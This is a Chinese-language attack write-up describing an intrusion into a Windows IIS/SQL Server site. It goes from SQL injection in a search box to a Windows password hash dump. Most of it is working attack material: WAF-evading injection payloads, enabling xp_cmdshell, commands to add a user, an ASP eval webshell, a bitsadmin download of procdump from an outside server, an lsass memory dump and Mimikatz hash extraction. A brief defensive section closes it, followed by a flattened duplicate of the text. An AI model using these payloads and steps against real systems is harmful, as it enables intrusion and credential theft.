sql注入到hash dump
字数 1022 2025-08-18 11:38:41

SQL注入到Hash Dump攻击全流程技术文档

1. 目标系统信息收集

  • 环境信息
    • 云服务:阿里云
    • 操作系统:Windows
    • Web服务器:IIS
    • 应用框架:ASPX
    • 数据库:SQL Server
    • 防护系统:云锁
    • 开放端口:80(HTTP)、1433(SQL Server)、3389(RDP)

2. SQL注入漏洞利用

2.1 初始发现

  • 注入点:系统搜索框
  • 防护绕过:云锁会封禁自动化工具(如sqlmap)的IP,需手动注入

2.2 手动注入Payload

1%';execute('sel'%2b'ect convert(int,@@version)') --
1%';execute('sel'%2b'ect convert(int,user)') --
1%';if(select IS_SRVROLEMEMBER('sysadmin'))=1 waitfor delay '0:0:5' --

2.3 权限确认

  • 当前用户权限:dbo
  • 确认具有sysadmin角色权限

3. 命令执行准备

3.1 启用xp_cmdshell

exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

3.2 无回显命令执行技术

将命令输出重定向到Web可访问目录:

1%';exec master.dbo.xp_cmdshell "whoami >> c:\\xxx\\Admin\\1.txt"
1%';exec master.dbo.xp_cmdshell "dir >> c:\\xxx\\Admin\\1.txt"
1%';exec master.dbo.xp_cmdshell "tasklist >> c:\\xxx\\Admin\\1.txt"

4. 权限提升尝试

4.1 添加用户失败

1%';exec master.dbo.xp_cmdshell "net user admin 1234qwer.. /add >> c:\\xxx\\Admin\\1.txt"
1%';exec master.dbo.xp_cmdshell "net user >> c:\\xxx\\Admin\\1.txt"

4.2 备选方案

  1. 写入Webshell

    echo ^<%eval request('x')%^> > c:\\wwwroot\\xxxx\Admin\\2.txt
echo ^<!--#include file='2.txt'c:\\wwwroot\\xxxx\Admin\\2.asp

  2. 冰蝎Webshell

    • 尝试使用base64编码后解码生成ASP马
    • 遇到字符长度限制问题

  3. FRP+Metasploit

    • VPS被封导致无法使用

5. Hash Dump技术

5.1 使用Procdump导出lsass.dmp

  1. 下载Procdump

    bitsadmin /transfer myDownLoadJob /download /priority normal "http://111.xxxx:82/ArcGIS/procdump.exe" "C:\\Windows\\system32\\procdump.exe"

  2. 执行Procdump

    procdump.exe -accepteula -ma lsass.exe lsass.dmp

  3. 转移文件

    copy lsass.dmp c:\wwwroot\xxxx\admin\lsass.dmp

5.2 文件下载技巧

  • 重命名为x.txt绕过下载限制
  • 本地再重命名为dmp格式

5.3 使用Mimikatz读取Hash

  • 获取lsass.dmp后,使用Mimikatz工具读取Windows密码哈希

6. 关键注意事项

  1. 绕过云锁防护

    • 避免使用自动化工具
    • 字符串拼接技术('sel'%2b'ect')
    • 使用延迟注入确认权限

  2. 无回显处理

    • 利用重定向到Web目录
    • 通过访问URL查看命令执行结果

  3. 文件传输技巧

    • 使用bitsadmin进行下载
    • 通过已控制的服务器中转文件
    • 重命名绕过下载限制

  4. 权限提升限制

    • 防护软件可能阻止用户添加
    • 备选方案是获取密码哈希

  5. 工具使用限制

    • 注意字符长度限制
    • 考虑文件大小和传输方式

7. 防御建议

  1. SQL注入防御

    • 使用参数化查询
    • 最小权限原则
    • 禁用xp_cmdshell等危险组件

  2. 系统加固

    • 限制lsass进程访问
    • 监控异常进程创建
    • 限制命令执行功能

  3. 日志监控

    • 监控异常SQL查询
    • 监控lsass进程转储行为
    • 监控异常文件创建

  4. 网络防护

    • 限制出站连接
    • 监控异常文件下载行为

  5. 权限控制

    • 限制数据库用户权限
    • 禁用不必要的系统存储过程
SQL注入到Hash Dump攻击全流程技术文档 1. 目标系统信息收集 环境信息 : 云服务:阿里云 操作系统:Windows Web服务器:IIS 应用框架:ASPX 数据库:SQL Server 防护系统:云锁 开放端口:80(HTTP)、1433(SQL Server)、3389(RDP) 2. SQL注入漏洞利用 2.1 初始发现 注入点:系统搜索框 防护绕过:云锁会封禁自动化工具(如sqlmap)的IP,需手动注入 2.2 手动注入Payload 2.3 权限确认 当前用户权限:dbo 确认具有sysadmin角色权限 3. 命令执行准备 3.1 启用xp_ cmdshell 3.2 无回显命令执行技术 将命令输出重定向到Web可访问目录: 4. 权限提升尝试 4.1 添加用户失败 4.2 备选方案 写入Webshell : 冰蝎Webshell : 尝试使用base64编码后解码生成ASP马 遇到字符长度限制问题 FRP+Metasploit : VPS被封导致无法使用 5. Hash Dump技术 5.1 使用Procdump导出lsass.dmp 下载Procdump : 执行Procdump : 转移文件 : 5.2 文件下载技巧 重命名为x.txt绕过下载限制 本地再重命名为dmp格式 5.3 使用Mimikatz读取Hash 获取lsass.dmp后,使用Mimikatz工具读取Windows密码哈希 6. 关键注意事项 绕过云锁防护 : 避免使用自动化工具 字符串拼接技术( 'sel'%2b'ect' ) 使用延迟注入确认权限 无回显处理 : 利用重定向到Web目录 通过访问URL查看命令执行结果 文件传输技巧 : 使用bitsadmin进行下载 通过已控制的服务器中转文件 重命名绕过下载限制 权限提升限制 : 防护软件可能阻止用户添加 备选方案是获取密码哈希 工具使用限制 : 注意字符长度限制 考虑文件大小和传输方式 7. 防御建议 SQL注入防御 : 使用参数化查询 最小权限原则 禁用xp_ cmdshell等危险组件 系统加固 : 限制lsass进程访问 监控异常进程创建 限制命令执行功能 日志监控 : 监控异常SQL查询 监控lsass进程转储行为 监控异常文件创建 网络防护 : 限制出站连接 监控异常文件下载行为 权限控制 : 限制数据库用户权限 禁用不必要的系统存储过程